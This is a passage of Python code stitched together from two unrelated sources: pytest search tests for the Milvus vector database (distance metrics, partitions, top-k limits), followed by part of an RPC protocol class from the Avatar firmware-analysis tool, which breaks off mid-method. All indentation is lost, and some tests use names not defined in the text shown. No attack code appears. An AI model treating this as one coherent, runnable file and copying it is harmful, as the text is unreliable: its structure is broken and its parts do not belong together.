collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
target: test concurrent search with multi-processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
# The following cases are copied from test_search.py
******************************************************************
"""
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
"""
Generate entities and add it in collection
"""
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
"""
Generate entities and add it in collection
"""
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_raw_vectors, insert_entities, ids
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_search_flat_top_k(self, connect, collection, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = 16385 # max top k is 16384
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, **query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
"""
target: test basic search function before and after deletion, all the search params is
correct, change top-k value.
check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, **query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, **query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, **query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, **query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
"""
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, **query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
"""
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, **default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
"""
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, **default_query)
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_l2(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
"""
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, **query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
"""
target: test concurrent search with multi processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, **default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_query_vector_only(self, connect, collection):
"""
target: test search normal scenario
method: search vector only
expected: search status ok, the length of result
"""
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, **default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L0)
def test_query_empty(self, connect, collection):
"""
method: search with empty query
expected: error raised
"""
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
|
avatar_protocol.py | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import object
from future import standard_library
standard_library.install_aliases()
import threading
import logging
from queue import Queue, Empty
from avatar.util.reference import Reference
from avatar.interfaces.avatar_stub.avatar_protocol_lowlevel import AvatarLowlevelProtocol
from avatar.interfaces.avatar_stub.avatar_messages import create_avatar_message
from avatar.interfaces.avatar_stub.avatar_exceptions import AvatarRemoteError
log = logging.getLogger(__name__)
ASYNCHRONOUS_MESSAGES = ["AVATAR_RPC_DTH_STATE", "AVATAR_RPC_DTH_PAGEFAULT", "AVATAR_RPC_DTH_INFO_EXCEPTION"]
RESPONSE_TIMEOUT = 10
class AvatarProtocol(object):
CONNECT_TIMEOUT = 10
def __init__(self, sock, paging_handler = lambda x: None):
#TODO: Put a meaningful timeout
self._socket = sock
self._protocol = AvatarLowlevelProtocol(self._socket, self._handle_received_message)
self._terminate = threading.Event()
self._state = None
self._asynchronous_messages_handler = paging_handler
self._queued_commands = Queue()
self._received_synchronous_messages = Queue()
self._send_thread = threading.Thread(target = self.run_send)
self._send_lock = threading.Lock()
self._send_thread.start()
def _handle_received_message(self, msg):
if msg.name in ASYNCHRONOUS_MESSAGES:
self.handle_asynchronous_message(msg)
else:
self._received_synchronous_messages.put(msg)
def run_send(self):
while not self._terminate.is_set():
result = None
try:
result = self._queued_commands.get(timeout = 1)
except Empty:
continue
if not result:
continue
self._send_lock.acquire()
self._protocol.send_message(result[0])
self._send_lock.release()
if result[1]:
log.debug("Waiting for response to message %s", result[0].name)
recv_msg = self._received_synchronous_messages.get(timeout = RESPONSE_TIMEOUT)
if recv_msg and recv_msg.name in result[1]:
if result[2]:
result[2].acquire()
if result[3]:
result[3].set_value(recv_msg)
result[2].notify()
result[2].release()
else:
log.warn("Unexpected message received: %s", recv_msg.name)
def handle_asynchronous_message(self, msg):
if msg.name == "AVATAR_RPC_DTH_PAGEFAULT":
page_data = self._page_fault_handler(msg.page_address)
self.insert_page(msg.page_address, page_data)
self._send_lock.acquire()
self._protocol.send_message(create_avatar_message("AVATAR_RPC_HTD_CONTINUE_FROM_PAGEFAULT", {}))
self._send_lock.release()
elif msg.name == "AVATAR_RPC_DTH_STATE":
self._state = msg.state
elif msg.name == "AVATAR_RPC_DTH_INFO_EXCEPTION":
self._exception_handler(msg.exception)
self._asynchronous_messages_handler(msg)
def set_register(self, register, value):
msg = create_avatar_message("AVATAR_RPC_HTD_SET_REGISTER", {"register": register, "value": value})
expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
def get_register(self, register):
msg = create_avatar_message("AVATAR_RPC_HTD_GET_REGISTER", {"register": register})
expected_replies = ["AVATAR_RPC_DTH_REPLY_GET_REGISTER", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
return ref.get_value().value
def read_memory(self, address, size):
msg = create_avatar_message("AVATAR_RPC_HTD_READ_MEMORY", {"address": address, "size": size})
expected_replies = ["AVATAR_RPC_DTH_REPLY_READ_MEMORY", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
